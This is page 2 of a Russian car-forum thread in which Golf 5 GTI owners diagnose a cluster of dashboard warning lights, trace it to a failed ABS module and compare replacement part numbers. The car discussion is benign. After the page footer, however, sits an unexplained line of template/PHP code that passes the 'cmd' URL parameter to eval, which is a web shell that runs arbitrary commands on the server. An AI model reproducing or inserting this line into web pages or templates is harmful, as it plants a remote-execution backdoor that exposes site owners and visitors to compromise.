+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 28

Тема: "Новогодняя елка" на приборке


  1. #11
    GTI-Racing Jahnglist3000 is on a distinguished road Аватар для Jahnglist3000
    Регистрация
    31.10.2012
    Откуда
    GreenCity
    Машина
    VW Golf 5 GTI
    Сообщений
    129
    Цитата Сообщение от has92 Посмотреть сообщение
    Такая же проблема началась! горит есп, давление в шинах, мигает ручник, стрелка спидометра начинает прыгать, загорается значек заправки. Заводится без проблем, едет тоже.
    Вы смогли решить проблему??
    Под капотом нашел следы от крысы.
    Что делать, куда ехать??
    Какие следы? Если следы съеденной проводки, то сразу к электрику и чем раньше, тем лучше, а то и загореться не долго.

    Если нет, то первым делом проверить пердохранители, снять ошибки с ЭБУ, если есть чем. Если нечем - попробовать скинуть клемму "-". Не поможет - к грамотному электрику, прозванивать электрику на предмет повреждений. Процесс не быстрый и не очень дешевый...

    Для примера (немного не в тему, но все же): вчера внезапно перестали работать две колонки в пассажирской двери - ВЧ и НЧ, остальные работали отлично. Машину покачал, по колесам постучал - не помогло :) Решил уже ехать к электрику, но дай, думаю, вытащу предохранитель магнитолы ради прикола. Вынул, проверил, он нормальный, вставил обратно. Включаю - все работает. ВАГи... Они такие :)
    GTIpower

  2. #12
    GTI-Racing has92 is on a distinguished road Аватар для has92
    Регистрация
    29.06.2011
    Откуда
    Москва
    Машина
    Golf GTI 5
    Сообщений
    65
    Цитата Сообщение от Jahnglist3000 Посмотреть сообщение
    Какие следы? Если следы съеденной проводки, то сразу к электрику и чем раньше, тем лучше, а то и загореться не долго.

    Если нет, то первым делом проверить пердохранители, снять ошибки с ЭБУ, если есть чем. Если нечем - попробовать скинуть клемму "-". Не поможет - к грамотному электрику, прозванивать электрику на предмет повреждений. Процесс не быстрый и не очень дешевый...

    Для примера (немного не в тему, но все же): вчера внезапно перестали работать две колонки в пассажирской двери - ВЧ и НЧ, остальные работали отлично. Машину покачал, по колесам постучал - не помогло :) Решил уже ехать к электрику, но дай, думаю, вытащу предохранитель магнитолы ради прикола. Вынул, проверил, он нормальный, вставил обратно. Включаю - все работает. ВАГи... Они такие :)
    Следы прибывания крысы, а имено косточки.Я понимаю что затягивать не стоит. А вот куда обратится пока не знаю

  3. #13
    GTI-Racing Jahnglist3000 is on a distinguished road Аватар для Jahnglist3000
    Регистрация
    31.10.2012
    Откуда
    GreenCity
    Машина
    VW Golf 5 GTI
    Сообщений
    129
    Цитата Сообщение от has92 Посмотреть сообщение
    Следы прибывания крысы, а имено косточки.Я понимаю что затягивать не стоит. А вот куда обратитсятамка не знаю
    Ну не к официалам, это уж точно, если, конечно, гарантии нет. Нормальный электрик спокойно справится. А предохраны все-таки проверь
    GTIpower

  4. #14
    GTI-Racing catalyst is on a distinguished road Аватар для catalyst
    Регистрация
    30.01.2013
    Откуда
    Краснодар
    Машина
    Golf 5 GTI 08
    Сообщений
    164
    Цитата Сообщение от has92 Посмотреть сообщение
    Такая же проблема началась! горит есп, давление в шинах, мигает ручник, стрелка спидометра начинает прыгать, загорается значек заправки. Заводится без проблем, едет тоже.
    Вы смогли решить проблему??
    Под капотом нашел следы от крысы.
    Что делать, куда ехать??
    Ошибки 01130 - Режим ABS и 16352 - Блок управления? походу АБСке твоей кирдык, очень частая проблема на всем пятом поколении джеты и гольфа. Их делали непонятно из какого дерьма. Очень много жалоб на эту ситуацию в интернете. Для примера пара ссылок с гольфклуба

    http://www.vw-golfclub.ru/forum/showthread.php?t=21334
    http://www.vw-golfclub.ru/forum/showthread.php?t=7338

  5. #15
    GTI-Racing has92 is on a distinguished road Аватар для has92
    Регистрация
    29.06.2011
    Откуда
    Москва
    Машина
    Golf GTI 5
    Сообщений
    65
    Цитата Сообщение от catalyst Посмотреть сообщение
    Ошибки 01130 - Режим ABS и 16352 - Блок управления? походу АБСке твоей кирдык, очень частая проблема на всем пятом поколении джеты и гольфа. Их делали непонятно из какого дерьма. Очень много жалоб на эту ситуацию в интернете. Для примера пара ссылок с гольфклуба

    http://www.vw-golfclub.ru/forum/showthread.php?t=21334
    http://www.vw-golfclub.ru/forum/showthread.php?t=7338
    Сегодня ездил к Диллеру, в итоге приговорили Блок АБС.
    Рекомендуют такой 1K0614517BKBEF
    У меня один вопрос, подскажите где будет бюджетнее взять?

  6. #16
    GTI-Racing catalyst is on a distinguished road Аватар для catalyst
    Регистрация
    30.01.2013
    Откуда
    Краснодар
    Машина
    Golf 5 GTI 08
    Сообщений
    164
    они рекомендуют максимально новый для гти 5 который они смогут прописать через онлайн

    тебе они порекомендовали Электроника 1К0907379АР помпа 1K0614517BKBEF

    1К0907379АР на мой взгляд устаревший блок а стоит у дилера до чертиков. Ты же не у них будешь ставить? Ставь новейший 1K0907379BL или 1K0907379BJ купить можно на ебей, механически заменить его и прокачать тормоза сможет любой механик, а прописать и адаптировать сможешь сам имея VAGCOM, там час делов

  7. #17
    GTI-Racing has92 is on a distinguished road Аватар для has92
    Регистрация
    29.06.2011
    Откуда
    Москва
    Машина
    Golf GTI 5
    Сообщений
    65
    Цитата Сообщение от catalyst Посмотреть сообщение
    они рекомендуют максимально новый для гти 5 который они смогут прописать через онлайн

    тебе они порекомендовали Электроника 1К0907379АР помпа 1K0614517BKBEF

    1К0907379АР на мой взгляд устаревший блок а стоит у дилера до чертиков. Ты же не у них будешь ставить? Ставь новейший 1K0907379BL или 1K0907379BJ купить можно на ебей, механически заменить его и прокачать тормоза сможет любой механик, а прописать и адаптировать сможешь сам имея VAGCOM, там час делов
    У дилера мне сказали что это самый новый для моего авто 1K0614517BKBEF

  8. #18
    GTI-Racing catalyst is on a distinguished road Аватар для catalyst
    Регистрация
    30.01.2013
    Откуда
    Краснодар
    Машина
    Golf 5 GTI 08
    Сообщений
    164
    да, именно для ТВОЕГО авто это самый новый, но ты можешь поставить еще новее, они не предложили такой вариант потому что программа не покажет его, да и прописать блок не смогут через онлайн. Самый новый на данный момент 1K0907379BL в нем есть поддержка автопаркинга последней версии, XDS, полностью отключаемая ESP и так далее

  9. #19
    GTI-Racing has92 is on a distinguished road Аватар для has92
    Регистрация
    29.06.2011
    Откуда
    Москва
    Машина
    Golf GTI 5
    Сообщений
    65
    Цитата Сообщение от catalyst Посмотреть сообщение
    они рекомендуют максимально новый для гти 5 который они смогут прописать через онлайн

    тебе они порекомендовали Электроника 1К0907379АР помпа 1K0614517BKBEF

    1К0907379АР на мой взгляд устаревший блок а стоит у дилера до чертиков. Ты же не у них будешь ставить? Ставь новейший 1K0907379BL или 1K0907379BJ купить можно на ебей, механически заменить его и прокачать тормоза сможет любой механик, а прописать и адаптировать сможешь сам имея VAGCOM, там час делов
    Объясни пожалуйста, те номера что ты дал это блок в сборе или одна из частей?

  10. #20
    GTI-Racing catalyst is on a distinguished road Аватар для catalyst
    Регистрация
    30.01.2013
    Откуда
    Краснодар
    Машина
    Golf 5 GTI 08
    Сообщений
    164
    блок АБС ищется именно по блоку электроники а не по номеру помпы, понимаешь? 1K0907379BL это электроника и она в сборе с помпой. В общем я свой совет дал и ссылки выше привел, 1K0907379BL и 1K0907379BJ это самые новые "полные" блоки, лучше просто нет, а дальше покупай что хочешь

    а дилер ничего новее 1К0907379АР не подскажет просто потому что программа ничего новее для твоего ВИНа не выдаст, вот и все

    вот еще пара ссылок по установке

    http://www.vw-golfclub.ru/forum/show...t=39281&page=6
    http://www.vw-golfclub.ru/forum/show...t=39626&page=5

    У самого щас BL блок стоит, проехал с ним 5000 км, XDS вещь суперская
    Последний раз редактировалось catalyst; 20.10.2013 в 18:21.

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 02.04.2024, 06:45
  2. "I этап Кубка "МАГИСТРАЛЬ 2012" - 17 марта"
    от Magistral в разделе Туризм и отдых
    Ответов: 3
    Последнее сообщение: 02.04.2024, 03:58
  3. Ответов: 2
    Последнее сообщение: 02.04.2024, 01:56
  4. Ответов: 11
    Последнее сообщение: 03.01.2024, 17:28

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}